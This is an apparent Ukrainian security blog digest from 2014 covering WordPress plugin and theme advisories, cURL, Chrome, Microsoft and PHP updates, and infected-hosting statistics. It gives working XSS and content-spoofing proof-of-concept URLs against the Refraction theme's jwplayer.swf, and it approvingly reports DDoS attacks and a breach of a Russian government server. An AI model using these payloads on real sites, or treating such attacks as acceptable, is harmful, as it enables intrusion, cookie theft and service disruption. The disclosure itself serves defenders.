Websecurity - Веб безпека

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах All In One Carousel, Post To PDF та Widget Control. Для котрих з’явилися експлоіти. All In One Carousel - це плагін для ротації банерів, Post To PDF - це плагін для публікації в формат PDF, Widget Control - це плагін для керування віджетами.

• Wordpress all_in_one_carousel Plugin XSS, CSRF Vuln (деталі)
• WordPress Post To PDF 2.3.1 Cross Site Scripting (деталі)
• WordPress Widget Control 1.0.1 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В серпні вже відбувалися DDoS атаки на сайти ДНР і ЛНР. Розповім про DDoS атаки на сайти цих терористичних організацій, що мали місце у вересні.

Це DDoS атаки на різні сайти ДНР і ЛНР, які ГПУ визнала терористичними організаціями, а також на сайти, які підтримують їх. Що були проведені Українськими Кібер Військами.

DDoS на rusimperia.info - 01.09.2014
DDoS на newsnews.tv - 01-14.09.2014
DDoS на ungu.org - 01-14.09.2014
DDoS на odessa-antimaydan.com - 01-14.09.2014
DDoS на icp.su - 03-14.09.2014
DDoS на odnarodyna.com.ua - 03-07.09.2014 і 14.09.2014
DDoS на bne.su - 04-14.09.2014
DDoS на lvs-global.ru - 04-14.09.2014
DDoS на slemtt.myjino.ru - 04-14.09.2014
DDoS на interbrigada.org - 05.09.2014
DDoS на nahnews.com.ua - 07.09.2014
DDoS на livestarobelsk.org - 11-14.09.2014
Та інші сайти ДНР і ЛНР.

Таким чином українські хакери висловили протест проти цих незаконних організацій на їх сайтах. Деякі з них тимчасово не працювали, а деякі сайти припинили роботу.

Виявлений витік інформації в cURL і libcurl.

Уразливі продукти: cURL 7.38, libcurl 7.38.

Можлива передача кукісів стороннім сайтам.

• curl security update (деталі)

В даній добірці уразливості в веб додатках:

• Synology DSM multiple vulnerabilities (деталі)
• Critical security flaws in Nagios NRPE client/server crypto (деталі)
• Open Web Analytics Pre-Auth SQL Injection (деталі)
• phpMyBackupPro-2.4 Cross-Site Scripting vulnerability (деталі)
• HP Intelligent Management Center (iMC), HP IMC Branch Intelligent Management System Software Module (BIMS), and Comware Based Switches and Routers, Remote Code Execution, Disclosure of Information (деталі)

Раніше я вже писав про численні уразливості в численних темах для WordPress виробництва RocketTheme. Окрім тем цих розробників я виявив подібні уразливості в багатьох темах інших розробників (в тому числі в custom темах).

Інформую про Cross-Site Scripting, Content Spoofing та Full path disclosure уразливості в темі Refraction для WordPress. Розробленої RocketTheme.

Папка теми може називатися refraction або rt_refraction_wp.

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Ця XSS уразливість є лише в нових версіях теми з 5.x версією JW Player:

http://site/wp-content/themes/rt_refraction_wp/js/rokbox/jwplayer/jwplayer.swf?playerready=alert(document.cookie)

Content Spoofing (WASC-12):

http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

Full path disclosure (WASC-13):

В папці http://site/wp-content/themes/refraction/ (http://site/wp-content/themes/rt_refraction_wp/) в index.php та багатьох інших php-файлах теми є FPD, що спрацьовують при налаштуваннях PHP по замовчуванню.

Уразливі всі версії теми Refraction для WordPress.

У серпні, 26.08.2014, через півтора місяці після виходу Google Chrome 36, вийшов Google Chrome 37.

В браузері зроблено багато нововведень. А також виправлено 50 уразливостей.

Сполученню двох уразливостей (CVE-2014-3176, CVE-2014-3177) привласнений статус критичної проблеми, що дозволяє обійти всі рівні захисту браузера і виконати код у системі, за межами sandbox-оточення. 25 уразливостям привласнений високий рівень небезпеки.

• Релиз web-браузера Chrome 37 с устранением 50 уязвимостей (деталі)

У серпні Українські Кібер Війська окрім того, що взломали сайт Міністерства Оборони РФ, також взломали державний сервер Російської Федерації.

09.08.2014 Українські Кібер Війська захопили російських державний сервер. Всього було отримано та викладено в Інтернет 9,13 ГБ даних в архівах. В розархівованому вигляді це 33,97 ГБ даних.

Для демонстрації спочатку я розмістив один документ, а сьогодні ще два документи з цього серверу.

У вересні місяці Microsoft випустила 4 патчі. Що менше ніж у серпні.

У серпневому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло 4 бюлетенів по безпеці. Що закривають численні уразливості в програмних продуктах компанії. Один патч закриває критичну уразливість та три патчі закривають важливі уразливості.

Дані патчі стосуються всіх поточних операційних систем компанії Microsoft - Windows 2003, Vista, 2008, 7, 2008 R2, 8, 2012, RT, 8.1 та RT 8.1. А також Microsoft Lync Server, Internet Explorer та .NET Framework.

У серпні, 28.08.2014, вийшов PHP 5.6. Це перший випуск нової 5.6.x гілки.

У вересні, 18.09.2014, вийшли PHP 5.4.33 і PHP 5.5.17. У версії 5.4.33 виправлено 10 багів, а у версії 5.5.17 виправлено декілька багів. Дані релізи направлені на покращення стабільності гілок 5.4.x і 5.5.x.

Жодних уразливостей в цих версіях PHP виправлено не було.

По матеріалам http://www.php.net.

В підсумках хакерської активності в Уанеті в 1 півріччі 2014 я зазначав, що всього за цей період я виявив 83 інфікованих сайтів в Уанеті. Дані сайти хостилися на серверах різних хостінг провайдерів, як українських, так і закордонних.

Пропоную вам звіт про результати мого дослідження хостінгів, які розміщували інфіковані сайти в першому півріччі 2014 року. Багато з цих хостінг провайдерів робили це і минулого року. Щоб і хостери і Інтернет користувачі знали найбільших розповсюджувачів шкідливого програмного забезпечення (через інфіковані сайти).

В першому півріччі цього року наступні хостінг провайдери розміщували на своїх серверах інфіковані сайти: 1GB LLC, Adamant, AlexHost, Besthosting, Bigmir-Internet, Carolina Internet, Chereda, Colocall, DCTel, DIPT, Datagroup, Delta-X, Dream Line, EVEREST, Freehost, GIGABASE, GOODNET, Golden Lines, HOST-TELECOM, HVDS, Hetzner, HostBizUa, Hvosting, ISPsystem, Infocom, Inter-Telecom, Internet Communications, LINIATEL, LNUA, MACHOSTER, MAGEAL, MiroHost, NAVIGATOR, NETART, OMNILANCE, PLUSSERVER, RTCOMM, SERVERCENTRAL, SMARTYMEDIA, SOFTLAYER, The Planet, UARNet, UTEAM, Ukrnames, Velton Telecom, Volia, XServer, Укртелеком.

Найбільші інфіковані хостери (TOP-10):

• ISPsystem - 7 сайтів
• Hetzner - 6 сайтів
• Besthosting - 5 сайтів
• Datagroup - 5 сайтів
• Chereda - 3 сайтів
• HostBizUa - 3 сайтів
• Freehost - 2 сайтів
• Inter-Telecom - 2 сайтів
• Volia - 2 сайтів
• XServer - 2 сайтів

Всього було виявлено хостінги 77 сайтів з 83. У випадку інших 6 сайтів визначити хостінги не вдалося, тому що в даний момент ці сайти вже не працювали (вони явно були закриті через розміщення malware на цих ресурсах). За допомогою власної системи моніторингу SecurityAlert в більшості випадків я визначив хостерів під час виявлення цих інфікованих сайтів.